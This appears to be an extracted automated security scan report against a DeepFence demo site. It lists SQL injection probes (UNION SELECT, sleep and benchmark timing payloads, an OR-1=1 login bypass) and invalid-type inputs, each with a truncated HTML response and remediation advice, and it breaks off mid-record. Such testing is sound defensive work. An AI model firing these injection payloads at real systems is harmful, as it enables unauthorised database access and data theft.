CWE-89\nIssue Number #1929\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1930\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1 or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1931\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1932\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1933\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# benchmark(10000000,MD5(1))\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1934\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ') or sleep(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1935\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nSensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryAlerts hints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1936\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# HAVING 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1937\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or pg_SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1938\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or ('1'='1'/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1939\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1940\nInvalid Types\nAn Invalid Types Scan tries to confuse the system under test by deliberately inserting incorrectly \ntyped data into your parameters, for example, a string containing letters into a numeric field.\nAlerts usually indicate that you need to improve input validation and error handling.\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iotrue\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1941\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioGpM7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1942Scan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io0FB7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1943\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-1E4f\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 